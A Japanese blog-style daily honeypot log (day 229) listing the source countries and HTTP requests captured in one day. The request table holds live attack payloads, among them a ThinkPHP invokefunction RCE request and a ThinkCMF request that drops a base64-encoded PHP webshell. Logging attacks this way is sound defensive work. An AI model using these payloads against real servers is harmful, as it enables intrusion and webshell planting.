WOWHoneypot観察(229日目)
2019/10/31(木)
トータルは71件でした。
ハンティングログはありませんでした。
IPのロケーション別の件数は以下です。
| 中国 | 23 |
| アメリカ | 16 |
| オランダ | 6 |
| ブラジル | 6 |
| トルコ | 3 |
| イラン | 2 |
| ロシア | 2 |
| イギリス | 2 |
| イタリア | 1 |
| ギリシャ | 1 |
| スロバキア | 1 |
| ウクライナ | 1 |
| フィリピン | 1 |
| アルゼンチン | 1 |
| コロンビア | 1 |
| アルバニア | 1 |
| ポーランド | 1 |
| マレーシア | 1 |
| インドネシア | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 45 | アクセス | GET / |
| 5 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 4 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 4 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 3 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 2 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status | |
| 1 | Webshell設置の調査 | POST /pagefile.php |
| 1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 1 | 調査 | HEAD / |
| 1 | 調査 | GET /script |
| 1 | cfgファイルの調査 | GET /pps/cisco/cisco.cfg |
| 1 | cfgファイルの調査 | GET /app/provision/y000000000000.cfg |
| 1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&templateFile=public/inde&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27pagefile.php%27,base64_decode('PD9waHAgcHJlZ19yZXBsYWNlKCcvW2Vycm9ycGFnZV0vZScsQHN0cl9yb3QxMygnQG5mZnJlZygkX0NCRkdbY250cl0pOycpLCdzYWZ0Jyk7Pz4='))%3C/php%3E |
| 1 | 不正中継の試み | CONNECT www.google.com:443 |
にほんブログ村